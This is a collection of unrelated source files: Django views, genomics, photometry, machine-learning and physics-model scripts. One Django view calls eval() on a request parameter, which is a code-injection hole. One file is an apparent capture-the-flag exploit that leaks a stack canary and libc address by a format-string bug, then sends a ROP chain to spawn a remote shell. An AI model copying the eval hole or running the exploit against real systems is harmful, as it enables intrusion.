return HttpResponseRedirect("/admin/agencies")
def addCORequest(request_form, agency, date_rcv, request):
co_request = CoRequest(date_received = date_rcv,
agency = agency,
subject = request_form.cleaned_data['subject'],
action = request_form.cleaned_data['action'],
status = request_form.cleaned_data['status'],
user = request.user
)
co_request.save()
@transaction.atomic
def updateMonthlyAmount(request):
month = int(request.GET.get('month'))
wfp_id = int(request.GET.get('id_wfp'))
amount = eval(request.GET.get('amount'))
try:
wfp = WFPData.objects.get(id=wfp_id)
if month==1:
wfp.jan = amount
elif month==2:
wfp.feb = amount
elif month==3:
wfp.mar = amount
elif month==4:
wfp.apr = amount
elif month==5:
wfp.may = amount
elif month==6:
wfp.jun = amount
elif month==7:
wfp.jul = amount
elif month==8:
wfp.aug = amount
elif month==9:
wfp.sept = amount
elif month==10:
wfp.oct = amount
elif month==11:
wfp.nov = amount
else:
wfp.dec = amount
wfp.total = wfp.jan + wfp.feb + wfp.mar + wfp.apr + wfp.may + wfp.jun + wfp.jul + wfp.aug + wfp.sept + wfp.oct + wfp.nov + wfp.dec
wfp.save()
return HttpResponse('Updated')
except WFPData.DoesNotExist:
return HttpResponse('Error')
def updateActivity(request):
try:
wfp_id = request.GET.get('wfp_id')
activity = request.GET.get('activity')
program = request.GET.get('program')
allocation = request.GET.get('allocation')
wfp = WFPData.objects.get(id=wfp_id)
wfp.activity = activity
wfp.program = program
wfp.allocation = allocation
wfp.save()
return HttpResponse(activity);
except WFPData.DoesNotExist:
return HttpResponse('Error')
@login_required(login_url='/home')
@transaction.atomic
def delActivity(request):
activity_id = request.GET.get('activity_id')
try:
wfp_activity = WFPData.objects.get(id=activity_id)
performance_targets = PerformanceTarget.objects.filter(wfp_activity=wfp_activity).delete()
performance_report = PerformanceReport.objects.filter(activity=wfp_activity).delete()
wfp_activity.delete()
return HttpResponse('ok')
except WFPData.DoesNotExist:
return HttpResponseRedirect('/home')
def delPerfTarget(request):
try:
pi_id = request.GET.get('id')
perf_target = PerformanceTarget.objects.get(id=pi_id).delete()
return HttpResponse('Deleted')
except:
return HttpResponse('Error')
def addPerfTarget(request):
try:
wfp_id = request.GET.get('id_wfp')
wfp = WFPData.objects.get(id=wfp_id)
perf_target = PerformanceTarget(wfp_activity = wfp,
indicator = request.GET.get('pi'),
jan = request.GET.get('jan', 0),
feb = request.GET.get('feb', 0),
mar = request.GET.get('mar', 0),
apr = request.GET.get('apr', 0),
may = request.GET.get('may', 0),
jun = request.GET.get('jun', 0),
jul = request.GET.get('jul', 0),
aug = request.GET.get('aug', 0),
sept = request.GET.get('sept', 0),
oct = request.GET.get('oct', 0),
nov = request.GET.get('nov', 0),
dec = request.GET.get('dec', 0)
)
perf_target.save()
return HttpResponse('Added')
except WFPData.DoesNotExist:
return HttpResponse('Error')
def getPerformanceAcc(request):
context = RequestContext(request)
data = {}
activity = WFPData.objects.get(id=request.GET.get('activity'))
month = request.GET.get('month',datetime.today().month)
try:
perf_targets = []
targets = PerformanceTarget.objects.filter(wfp_activity=activity)
for target in targets:
month = int(month)
if month==1:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.jan
})
elif month==2:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.feb
})
elif month==3:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.mar
})
elif month==4:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.apr
})
elif month==5:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.may
})
elif month==6:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.jun
})
elif month==7:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.jul
})
elif month==8:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.aug
})
elif month==9:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.sept
})
elif month==10:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.oct
})
elif month==11:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.nov
})
else:
perf_targets.append({'id' : target.id,
'indicator': target.indicator,
'target' : target.nov
})
data['perf_targets'] = perf_targets
return render_to_response('./admin/performance_acc.html', data, context)
except PerformanceTarget.DoesNotExist:
return render_to_response('./admin/performance_acc.html', data, context)
'''
helper methods
'''
def getProgOverview(allocation, agency, year):
cursor = connection.cursor()
query = '''
select distinct(program) from wfp_data
where allocation=%s and agency_id=%s and year=%s
'''
cursor.execute(query, [allocation, agency.id, year])
prog_acts = []
maj_prog = cursor.fetchall()
for prog in maj_prog:
acts = []
activities = WFPData.objects.filter(agency=agency, allocation=allocation , year=year, program=prog[0])
for act in activities:
physical_targets = PerformanceTarget.objects.filter(wfp_activity = act)
targets = []
for target in physical_targets:
targets.append({'indicator': target.indicator,
'q1' : target.jan+target.feb+target.mar,
'q2' : target.apr+target.may+target.jun,
'q3' : target.jul+target.aug+target.sept,
'q4' : target.oct+target.nov+target.dec})
acts.append({'activity' : act,
'physical_targets' : targets
})
prog_acts.append({'prog' : prog[0], 'acts' : acts})
return prog_acts
@transaction.atomic
def getWFPTotal(agency, year):
cursor = connection.cursor()
query = '''
select sum(jan) as jan_total, sum(feb) as feb_total, sum(mar) as mar_total,
sum(apr) as apr_total, sum(may) as may_total, sum(jun) as jun_total,
sum(jul) as jul_total, sum(aug) as aug_total, sum(sept) as sept_total,
sum(oct) as oct_total, sum(nov) as nov_total, sum(`dec`) as dec_total,
sum(total) as total
from wfp_data
where agency_id=%s and year=%s
'''
cursor.execute(query, [agency.id, year])
return dictfetchall(cursor)[0]
|
994,922 | 22639e8d67ea484ba4363c34ed86bbf8996dfbeb | #! /usr/local/packages/Python-2.6.4/bin/python
from sys import *
from collections import defaultdict
import optparse
import re
###############################################################################
# command line parameters
usage = """find_intergenic_background_cutoff.py [options] zcontig_length_file gff3_file wig_file*
This script produces a depth-of-coverage cut-off intended for transcript
finding, defined as a particular quantile of the distribution of
depths-of-coverage over what we hope are dependably intergenic regions.
These are positions meeting the following criteria:
No feature covers the position
The nearest flanking features both point away from the position
The distance to those flanking features is neither too short nor too long
The contig length file should be tab-delimited, with no header and two columns: contig ID and length
"""
parser = optparse.OptionParser(usage=usage)
parser.add_option('-q', '--quantile', type='float', default=0.7,
help='quantile (0-1) of coverage to output (default 0.7)')
parser.add_option('-n', '--min_interbutt', type='int', default=50,
help='minimum distance from nearest flanking feature (default 50)')
parser.add_option('-x', '--max_interbutt', type='int', default=1000,
help='maximum distance from nearest flanking feature (default 1000)')
parser.add_option('-g', '--gff3_file', help='Path to a GFF3 file')
parser.add_option('-c', '--contig_length_file', help='Path to a contig lengths file')
parser.add_option('-w', '--wig_file', help='Path to a WIG file')
parser.add_option('-W', '--second_wig', help='Path to a second WIG file that is a pair to the file specified in --wig_file')
(options, args) = parser.parse_args()
quantile = options.quantile
min_interbutt = options.min_interbutt
max_interbutt = options.max_interbutt
contig_length_file = open(options.contig_length_file)
gff3_file = open(options.gff3_file)
wig_files = []
wig1 = open(options.wig_file)
wig_files.append(wig1)
if options.second_wig:
wig2 = open(options.second_wig)
wig_files.append(wig2)
###############################################################################
# read contig length file
contig_length = {}
for line in contig_length_file:
contig, length = line[:-1].split('\t')
contig_length[contig] = int(length)
contig_length_file.close()
###############################################################################
# read gff3 file
contig_direction_position_genic = {}
for line in gff3_file:
if line.startswith('#'):
continue
contig, unk1, span_type, start, end, unk2, direction, unk3, att_val_pairs = line[:-1].split('\t')
start, end = map(int, (start, end))
direction = intern(direction)
try:
direction_position_genic = contig_direction_position_genic[contig]
except:
direction_position_genic = contig_direction_position_genic[contig] = {
'+' : [False] * contig_length[contig],
'-' : [False] * contig_length[contig]
}
position_genic = direction_position_genic[direction]
for position in range(start - 1, end):
position_genic[position] = True
gff3_file.close()
###############################################################################
# calculate interbutts: for each position on each contig, is the position
# outside of any annotated gene, are the nearest flanking genes both oriented
# away from the current position, and if so, what is the distance to the
# nearest of the two flanking genes
def calculate_distance_from_most_recent_gene(position_genic):
distance_from_most_recent_gene = []
distance = 0
for position, genic in enumerate(position_genic):
if genic:
distance = 0
else:
distance += 1
distance_from_most_recent_gene.append(distance)
return distance_from_most_recent_gene
contig_position_interbutt = {}
for contig, direction_position_genic in contig_direction_position_genic.iteritems():
distance_from_plus_left = calculate_distance_from_most_recent_gene(direction_position_genic['+'])
distance_from_minus_left = calculate_distance_from_most_recent_gene(direction_position_genic['-'])
distance_from_plus_right = list(reversed(calculate_distance_from_most_recent_gene(reversed(direction_position_genic['+']))))
distance_from_minus_right = list(reversed(calculate_distance_from_most_recent_gene(reversed(direction_position_genic['-']))))
position_interbutt = contig_position_interbutt[contig] = []
for position in range(contig_length[contig]):
position_interbutt.append(
distance_from_minus_left[position] < distance_from_plus_left[position]
and distance_from_plus_right[position] < distance_from_minus_right[position]
and min(distance_from_minus_left[position], distance_from_plus_right)
)
###############################################################################
# read WIG files
#One of two possible header types
variableStep_header_line_pat = re.compile('^variableStep chrom=(.*)$')
fixedStep_header_line_pat = re.compile(r'^fixedStep chrom=(\S+) start=(\d+) step=(\d+)')
def read_wig(file):
contig_position_count = defaultdict(lambda: defaultdict(lambda: 0))
contig = None
in_fixed = in_variable = False
for line in file:
#Either match the fixed step header or the variable step header
match = fixedStep_header_line_pat.match(line)
if match:
contig, start, step = match.groups()
position = int(start)
step = int(step)
in_fixed = True
in_variable = False
else:
match = variableStep_header_line_pat.match(line)
if match:
contig, = match.groups()
in_variable = True
in_fixed = False
elif in_fixed:
assert contig is not None
count = int(line.strip())
contig_position_count[contig][position] = count
position += step
else:
assert in_variable
assert contig is not None
position, count = map(float, line[:-1].split('\t'))
contig_position_count[contig][position] = count
return contig_position_count
contig_position_counts = []
for wig_file in wig_files:
contig_position_counts.append(read_wig(wig_file))
wig_file.close()
###############################################################################
# for each WIG file, collect read counts for each position meeting the
# interbutt criteria
target_zone_countss = []
for contig_position_count in contig_position_counts:
target_zone_counts = []
for contig, position_interbutt in contig_position_interbutt.iteritems():
position_count = contig_position_count[contig]
for position, interbutt in enumerate(position_interbutt):
count = position_count[position]
if interbutt is not False and min_interbutt < interbutt < max_interbutt:
target_zone_counts.append(count)
target_zone_countss.append(target_zone_counts)
###############################################################################
# calculate a cutoff as the requested quantile for each set of counts, and
# average the individual cutoffs as the final output cutoff
def get_quantile(data, fraction=0.5):
data = list(sorted(data))
position = fraction * (len(data) - 1)
if position % 1 == 0.0:
return data[int(position)]
else:
position = int(position)
return 0.5 * (data[position] + data[position + 1])
cutoffs = [get_quantile(counts, quantile) for counts in target_zone_countss]
print sum(cutoffs) / float(len(cutoffs))
|
994,923 | 3f8ea9583311f3c4a1d672117d892bd422a276f8 | class Solution(object):
def maxArea(self, height):
# 초기 최대값을 리스트 양끝의 2개의 숫자의 크기로 지정
pointer1 = 0
pointer2 = len(height) - 1
max_Area = (len(height) - 1) * min(height[pointer1], height[pointer2])
# 높이로 지정된 값들을 차례로 하나씩 욺겨가며 넓이를 비교
for i in range(len(height) - 1):
width = len(height) - (i + 2) # 가로의 길이를 먼저 계산
# 왼쪽이 오른쪽 보다 작을 경우
if height[pointer1] < height[pointer2]:
# 왼쪽의 포인터를 한칸 오른쪽으로 이동한 후 넓이를 계산하여 원래값과 비교해 큰 값을 저장
pointer1 += 1
temp_Area = width * min(height[pointer1], height[pointer2])
if temp_Area > max_Area:
max_Area = temp_Area
# 오른쪽이 왼쪽보다 작을 경우
elif height[pointer1] >= height[pointer2]:
# 오른쪽의 포인터를 한칸 왼쪽으로 이동한 후 넓이를 계산하여 원래값과 비교해 큰 값을 저장
pointer2 -= 1
temp_Area = width * min(height[pointer1], height[pointer2])
if temp_Area > max_Area:
max_Area = temp_Area
return(max_Area)
|
994,924 | d9fbd3579039ed176ad2263eeaa747598ebdff4d |
def mod(a, b):
while (a - b > 0):
a -= b
return a
|
994,925 | 074e029b6d0293022f6a45ad860e4c4860c6fdf3 | """p2 S3 Storage App Config"""
from django.apps import AppConfig
class P2S3StorageConfig(AppConfig):
"""p2 S3Storage App Config"""
name = 'p2.storage.s3'
label = 'p2_storage_s3'
verbose_name = 'p2 S3 Storage'
|
994,926 | e74b85a643de17712cf4863a50672666af18e43e | import os
# third-party library
import torch
import torch.nn as nn
import torch.utils.data as Data
import torchvision
import matplotlib.pyplot as plt
from torch.autograd import Variable
# Hyper Parameters
EPOCH = 1 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 64
TIME_STEP = 28 # rnn time step / image height
INPUT_SIZE = 28 # rnn input size / image width
LR = 0.01 # learning rate
DOWNLOAD_MNIST = False
# Mnist digits dataset
if not(os.path.exists('./mnist/')) or not os.listdir('./mnist/'):
# not mnist dir or mnist is empyt dir
DOWNLOAD_MNIST = False
train_data = torchvision.datasets.MNIST(
root='./mnist/',
train=True, # this is training data
transform=torchvision.transforms.ToTensor(), # Converts a PIL.Image or numpy.ndarray to
# torch.FloatTensor of shape (C x H x W) and normalize in the range [0.0, 1.0]
download=DOWNLOAD_MNIST,
)
# plot one example
print(train_data.train_data.size()) # (60000, 28, 28)
print(train_data.train_labels.size()) # (60000)
# plt.imshow(train_data.train_data[0].numpy(), cmap='gray')
# plt.title('%i' % train_data.train_labels[0])
# plt.show()
test_data = torchvision.datasets.MNIST(root='./mnist/', train=False)
# Data Loader for easy mini-batch return in training
train_loader = torch.utils.data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True)
# convert test data into Variable, pick 2000 samples to speed up testing
# test_data = dsets.MNIST(root='./mnist/', train=False, transform=transforms.ToTensor())
test_x = test_data.test_data.type(torch.FloatTensor)[:2000]/255. # shape (2000, 28, 28) value in range(0,1)
test_y = test_data.test_labels.numpy()[:2000] # covert to numpy array
class RNN(nn.Module):
"""docstring for RNN"""
def __init__(self):
super(RNN, self).__init__()
self.rnn = nn.LSTM(
input_size=INPUT_SIZE,
hidden_size=64,
num_layers=1,
batch_first=True
)
self.output = nn.Linear(64, 10)
def forward(self, x):
r_out,(h_n, h_c) = self.rnn(x, None) # x (batch, time_step, input_size)
output = self.output(r_out[:, -1, :]) # (batch, time_step, input_size)
return output
rnn = RNN()
print(rnn)
optimizer = torch.optim.Adam(rnn.parameters(), lr=LR) # optimize all cnn parameters
loss_func = nn.CrossEntropyLoss() # the target label is not one-hotted
# training and testing
for epoch in range(EPOCH):
for step, (b_x, b_y) in enumerate(train_loader): # gives batch data
b_x = b_x.view(-1, 28, 28) # reshape x to (batch, time_step, input_size)
b_x = Variable(b_x)
b_y = Variable(b_y)
output = rnn(b_x) # rnn output
loss = loss_func(output, b_y) # cross entropy loss
optimizer.zero_grad() # clear gradients for this training step
loss.backward() # backpropagation, compute gradients
optimizer.step() # apply gradients
if step % 50 == 0:
test_output = rnn(test_x) # (samples, time_step, input_size)
pred_y = torch.max(test_output, 1)[1].data.numpy()
accuracy = float((pred_y == test_y).astype(int).sum()) / float(test_y.size)
print('Epoch: ', epoch, '| train loss: %.4f' % loss.data.numpy(), '| test accuracy: %.2f' % accuracy)
# print 10 predictions from test data
test_output = rnn(test_x[:10].view(-1, 28, 28))
pred_y = torch.max(test_output, 1)[1].data.numpy()
print(pred_y, 'prediction number')
print(test_y[:10], 'real number') |
994,927 | d6ca457cf11db98d4cd0699fec161c063c684a22 | # Generated by Django 2.1 on 2018-09-03 04:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('onorapp', '0024_news'),
]
operations = [
migrations.AddField(
model_name='categorylist',
name='banner_image',
field=models.ImageField(blank=True, null=True, upload_to='categorylist_bannerimage'),
),
]
|
994,928 | e68b2988a5a1a09b0446850bf83c9baa2cba2df2 | #!/usr/bin/env python
from astropy.io import ascii,fits
from astropy.wcs import WCS
from astropy.table import join,vstack,Table
from CSPlib.phot import ApPhot,compute_zpt
from CSPlib import database
from CSPlib.tel_specs import getTelIns
from CSPlib import config
from CSPlib.config import getconfig
from matplotlib import pyplot as plt
from astropy.visualization import simple_norm
import argparse
import sys,os
import numpy as np
import warnings
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Do aperture photometry")
parser.add_argument("image", help="list of science images", nargs="+")
parser.add_argument("-cat", help="Catalog file")
parser.add_argument("-objcol", help="Object column name in catalog file",
default="col2")
parser.add_argument("-RAcol", help="RA column name in catalog file",
default="col3")
parser.add_argument("-DECcol", help="DEC column name in catalog file",
default="col4")
parser.add_argument("-tel", help="Telescope code", default='SWO')
parser.add_argument("-ins", help="Insrument code", default='NC')
parser.add_argument("-snap", help="Aperture number for SN", type=int,
default=-1)
parser.add_argument("-o", help="Output SN photometryfile",
default="SNphot.dat")
parser.add_argument("-db", help="Database to query LS coordinates (if no cat)",
default='POISE')
args = parser.parse_args()
specs = getTelIns(args.tel, args.ins)
cfg = config.getconfig()
Naps = len(cfg.photometry.aps)
SNrows = []
for imgfile in args.image:
aphot = ApPhot(imgfile)
print('Working on {}'.format(imgfile))
if args.cat is None:
cat = database.getLSCoords(aphot.object, db=args.db)
aphot.loadObjCatalog(table=cat, racol='RA', deccol='DEC', objcol='objID')
else:
aphot.loadObjCatalog(filename=args.cat, racol=args.RAcol,
deccol=args.DECcol, objcol=args.objcol)
aphot.makeApertures(appsizes=cfg.photometry.aps,
sky_in=cfg.photometry.skyin, sky_out=cfg.photometry.skyout)
#with warnings.catch_warnings():
# warnings.simplefilter("ignore")
# aphot.plotCutOuts(xcols=6, ycols=6)
try:
phot = aphot.doPhotometry()
except:
print('Photometry failed for {}, skipping...'.format(imgfile))
continue
gids = True
for i in range(0,Naps):
gids = gids*~np.isnan(phot['ap{}'.format(i)])
gids = gids*~np.isnan(phot['ap{}er'.format(i)])
if not np.sometrue(gids):
print('All the apertures for {} had problems, skipping...'.format(
imgfile))
continue
phot = phot[gids]
phot.rename_column('OBJ','objID')
phot.remove_column('id')
phot.sort('objID')
phot['xcenter'].info.format = "%.2f"
phot['ycenter'].info.format = "%.2f"
# Re-order columns
cols = ['objID','xcenter','ycenter','msky','mskyer']
for i in range(Naps):
cols.append('flux{}'.format(i))
cols.append('eflux{}'.format(i))
cols.append('ap{}'.format(i))
cols.append('ap{}er'.format(i))
cols += ['flags','fits']
phot = phot[cols]
phot = phot.filled(fill_value=-1)
phot.write(imgfile.replace('.fits','.phot'),
format='ascii.fixed_width', delimiter=None, overwrite=True)
# Name of the final aperture (assumed to be the standard)
apn = "ap{}".format(len(cfg.photometry.aps)-1)
apner = "ap{}er".format(len(cfg.photometry.aps)-1)
|
994,929 | a1d762cc75eebc911cf2d3699ac5b2336a2ff4b3 | def answer(n):
word = n[0]
for letter in n[1:]:
if letter < word[0]:
word += letter
else:
word = letter + word
return word
with open("A-large.in") as f:
with open("A-large.out", "w") as w:
f.readline()
question = 1
for line in f:
n = line.strip()
output = answer(n)
w.write("Case #{0}: {1}\n".format(question, output))
question += 1
|
994,930 | cf7241326ab513efd09295a4a7c1ba4609a1a425 | from functools import reduce
import math
def mygcd(*diffs):
return reduce(math.gcd, diffs)
ans = 0
k = int(input())
for a in range (1, k + 1):
for b in range (1, k + 1):
for c in range (1, k + 1):
l = [a, b, c]
ans += mygcd(*l)
print (ans)
|
994,931 | 5b8d8576391d0ce5e27c55652c43d1fa4f6ea69e | a,b = map(int, input().split())
lcm = a*b
gcd = 0
while True:
gcd = max(a,b)%min(a,b)
a, b = min(a,b), gcd
if b == 0:
gcd = a
break
lcm //= gcd
print(gcd)
print(lcm)
|
994,932 | fdb1716c82c4456271e58744845bddc2c3fd603e | # Generated by Django 3.1.2 on 2020-11-30 13:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('setting', '0002_auto_20201130_1940'),
('product', '0002_auto_20201130_1646'),
]
operations = [
migrations.AlterField(
model_name='product',
name='uom',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='setting.uom'),
),
]
|
994,933 | 79a6d475d17d3e6de5f5e82d28f785c90993b884 | '''
EJERCICIO 3
Programa hecho por Mauricio Gibrán Colima Flores
Curso de Introducción a Python
'''
#Importar librería para limpiar pantalla
import os
os.system("cls")
#mensaje de bienvenida
print("\n\n\t\tEste es un programa que calcula tu año de nacimiendo en base en tu edad\n")
print("*Tenga en cuenta que este programa fue creado en 2020, por favor introduzca la edad que cumpla en este año\n\n")
#El usuario ingresa su edad
edad=input("Ingresa tu edad: ")
#Hace el cálculo del año
nacimiento=2020-int(edad)#Hacemos la primera conversion vista en el curso
#Muestra el año de nacimiento
print("El año en el que naciste es:"+str(nacimiento))
|
994,934 | ba77165cc5792319d34fd566298df2db6942998e | import socket, struct, os, binascii, base64, hashlib
import telnetlib
try:
import psyco; psyco.full()
except ImportError:
pass
def readline(sc, show = True):
res = ""
while len(res) == 0 or res[-1] != "\n":
data = sc.recv(1)
if len(data) == 0:
print repr(res)
raise Exception("Server disconnected")
res += data
if show:
print repr(res[:-1])
return res[:-1]
def read_until(sc, s):
res = ""
while not res.endswith(s):
data = sc.recv(1)
if len(data) == 0:
print repr(res)
raise Exception("Server disconnected")
res += data
return res[:-(len(s))]
def read_all(sc, n):
data = ""
while len(data) < n:
block = sc.recv(n - len(data))
if len(block) == 0:
print repr(data)
raise Exception("Server disconnected")
data += block
return data
def I(n):
return struct.pack("<I", n)
def Q(n):
return struct.pack("<Q", n)
def find_sol(src):
for a in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
for b in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
for c in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
for d in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
for e in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
cand = src+a+b+c+d+e
t = hashlib.sha1(cand).hexdigest()
if t.endswith("ffffff") and t[-7] in ("37bf"):
print "found", cand, t
return cand
print "NO SOL FOUND"
exit()
def solvechall(sc):
# Solve a puzzle: find an x such that 26 last bits of SHA1(x) are set, len(x)==29 and x[:24]=='e7f0de3f783bd45adcef43ed'
res = readline(sc)
src = res.split("x[:24]=='")[1].split("'")[0]
print src
sc.send(find_sol(src) + "\n")
sc = socket.create_connection(("time-is.quals.2017.volgactf.ru", 45678))
solvechall(sc)
offset_libc_return = 0x0000000000020830
offset_binsh = 0x000000000018C177
offset_system = 0x0000000000045390
# sc = socket.create_connection(("10.0.0.97", 12345))
# offset_libc_return = 0x0000000000021B45
# offset_binsh = 0x0000000000163708
# offset_system = 0x0000000000041490
readline(sc, False)
sc.send("%d" * 267 + "|%p" * 64 + "\n")
res = readline(sc, False)
res = res.split("|")
canary = int(res[1][2:], 16)
addr_libc_return = int(res[9][2:], 16)
addr_libc_base = addr_libc_return - offset_libc_return
print hex(canary), hex(addr_libc_base)
# readline(sc, False)
# sc.send("%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p|%s|%s|xxx" + Q(0x0000000000603048) + Q(0x0000000000603058) + "\n")
# res = readline(sc)
# res = res.split("|")
# addr_libc_time = struct.unpack("<Q", res[1].ljust(8, "\x00"))[0]
# addr_libc_gmtime = struct.unpack("<Q", res[2].ljust(8, "\x00"))[0]
# print hex(addr_libc_time), hex(addr_libc_gmtime)
rop_poprdi_retn = 0x0000000000400BA3
rop = "X" * 0x808 + Q(canary) + "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG" + Q(rop_poprdi_retn) + Q(addr_libc_base + offset_binsh) + Q(addr_libc_base + offset_system)
readline(sc, False)
sc.send(rop + "\n")
readline(sc, False)
sc.send("q\n")
t = telnetlib.Telnet()
t.sock = sc
t.interact()
while True:
data = sc.recv(16384)
if len(data) == 0:
break
for line in data.split("\n"):
print repr(line)
|
994,935 | 792cbb25d43c81e79869ff302b94d4332c673815 | from django.core.management.base import BaseCommand, CommandError
from crazyflie.models import SolvedTrajectory
import decimal
import random
import math
import time
class Command(BaseCommand):
help = 'Starts a process to sync the solved trajectories to the database'
MIN_BENCHMARK_PITCH = 0
MAX_BENCHMARK_PITCH = 1
MIN_BENCHMARK_ROLL = 0
MAX_BENCHMARK_ROLL = 1
IDEAL_DIFFERENTIAL = decimal.Decimal(.01)
def add_arguments(self, parser):
"""
Accept the pitch and roll from the command line
"""
parser.add_argument(
'--pitch',
type=decimal.Decimal)
parser.add_argument(
'--roll',
type=decimal.Decimal)
parser.add_argument(
'--min_roll_differential',
default=decimal.Decimal(.1),
type=decimal.Decimal)
parser.add_argument(
'--ideal_min_roll_differential',
default=decimal.Decimal(.01),
type=decimal.Decimal)
parser.add_argument(
'--min_pitch_differential',
default=decimal.Decimal(.1),
type=decimal.Decimal)
parser.add_argument(
'--ideal_min_pitch_differential',
default=decimal.Decimal(.01),
type=decimal.Decimal)
parser.add_argument(
'--benchmark',
action="store_true",
default=False)
parser.add_argument(
'--benchmark_iterations',
default=1000,
type=int)
@classmethod
def get_match_score(cls, trajectory, pitch, roll):
"""
Takes in a trajectory and returns how close it
is to the inputted pitch and roll
"""
pitch_differential = abs(trajectory.pitch - pitch)
roll_differential = abs(trajectory.roll - roll)
return pow(pitch_differential, 2) + pow(roll_differential, 2)
@classmethod
def find_closest_trajectory(cls, **kwargs):
"""
Finds the file name associated with the
closest trajectory
"""
# if we can find an approximation that works to two
# decimal places, just return that
ideal_min_pitch = kwargs["pitch"] - \
kwargs.get("ideal_min_pitch_differential", cls.IDEAL_DIFFERENTIAL)
ideal_max_pitch = kwargs["pitch"] + \
kwargs.get("ideal_min_pitch_differential", cls.IDEAL_DIFFERENTIAL)
ideal_min_roll = kwargs["roll"] - \
kwargs.get("ideal_min_roll_differential", cls.IDEAL_DIFFERENTIAL)
ideal_max_roll = kwargs["roll"] + \
kwargs.get("ideal_min_roll_differential", cls.IDEAL_DIFFERENTIAL)
# find trajectories that we are good with even if they aren't the absolute
# best
ideal_trajectory = SolvedTrajectory.objects.filter(
pitch__gt=ideal_min_pitch,
roll__gt=ideal_min_roll
).filter(
pitch__lt=ideal_max_pitch,
roll__lt=ideal_max_roll)
ideal_trajectory = ideal_trajectory.first()
# if we found something in the ideal trajectory, just return that!
if ideal_trajectory:
best_trajectory = ideal_trajectory
best_match_score = cls.get_match_score(
best_trajectory, kwargs["pitch"], kwargs["roll"])
# otherwise, we expand our filter and include more results
else:
# determine bounds on the pitch and the roll
# of the trajectory we will return
min_pitch = kwargs["pitch"] - kwargs["min_pitch_differential"]
max_pitch = kwargs["pitch"] + kwargs["min_pitch_differential"]
min_roll = kwargs["roll"] - kwargs["min_roll_differential"]
max_roll = kwargs["roll"] + kwargs["min_roll_differential"]
# determine the candidate trajectories
candidate_trajectories = SolvedTrajectory.objects.filter(
pitch__gt=min_pitch,
roll__gt=min_roll
).filter(
pitch__lt=max_pitch,
roll__lt=max_roll
)
# determine the best match from what we have available
best_trajectory = None
best_match_score = float("inf")
for trajectory in candidate_trajectories:
match_score = cls.get_match_score(
trajectory, kwargs["pitch"], kwargs["roll"])
if match_score < best_match_score:
best_trajectory = trajectory
best_match_score = match_score
# calculate the norm of the deviation
deviation = math.sqrt(best_match_score)
return best_trajectory.file_name, deviation
def benchmark(self, **kwargs):
"""
Benchmarks the speed of the result
"""
num_iterations = kwargs.get("benchmark_iterations")
start_time = time.time()
# store how far off we are
deviations = []
for _ in xrange(num_iterations):
kwargs["roll"] = decimal.Decimal(random.uniform(
self.MIN_BENCHMARK_ROLL, self.MAX_BENCHMARK_ROLL))
kwargs["pitch"] = decimal.Decimal(random.uniform(
self.MIN_BENCHMARK_PITCH, self.MAX_BENCHMARK_PITCH))
_, deviation = self.find_closest_trajectory(**kwargs)
deviations.append(deviation)
# calculate results from the benchmarking
total_time = time.time() - start_time
average_time = total_time / num_iterations
average_deviation = sum(deviations) / len(deviations)
print "AVERAGE TIME: %s AVERAGE DEVIATION: %s" \
% (average_time, average_deviation)
def handle(self, *args, **options):
"""
Exposes a script to find the closest trajectory
"""
# used to test the speed of determining the closest
# trajectory
if options["benchmark"]:
self.benchmark(**options)
# finds the closest trajectory
else:
file_name, _ = self.find_closest_trajectory(**options)
return "solved_trajectories/" + file_name
|
994,936 | 2fc3713a2e9f9c2896ae07177433d17c573346fe | from .views import ChatListAPIView
from django.urls import path
app_name = 'api'
urlpatterns = [
path('chat/list/',ChatListAPIView.as_view(),name='list')
]
|
994,937 | 0b251e9b81d87cf88c7c05feca4565732a7d710e | def firstten():
n=1
while n<=10:
yield n
n=n+1
f=firstten()
for i in f:
print(i)
|
994,938 | 079e5c3fd57c1cc159034c3e84174824617c42f3 | #!/usr/bin/env python
"""
MCNPX Model for Cylindrical RPM8
"""
import sys
sys.path.append('../MCNPTools/')
sys.path.append('../')
from MCNPMaterial import Materials
import subprocess
import math
import mctal
import numpy as np
import itertools
import os
class CylinderRPM(object):
# Material Dictionaries
cellForStr = '{:5d} {:d} -{:4.3f} {:d} -{:d} u={:d}\n'
surfForStr = '{:5d} cz {:5.3f}\n'
tranForStr = '*tr{:d} {:4.3f} {:4.3f} 0.000\n'
geoParam={'RPM8Size':12.7,'DetectorThickness':0.01,'DetectorSpacing':0.8,
'CylinderLightGuideRadius':0.5,'CylinderRadius':2.5}
def __init__(self,inp='INP.mcnp'):
""" Wrapped Cylinder MCNPX Model of RPM8
Keywords:
inp -- desired name of the input deck
"""
# Material dictionary for the moderator, light guide, and detector
self.material = {'Moderator':None,'Detector':None,'LightGuide':None}
self.material['Detector'] = {'name':'Detector','mt': 3, 'rho': 1.1,'matString':None} # detector
self.material['LightGuide'] = {'name': 'PMMA','mt':10, 'rho':0.93} # PMMA
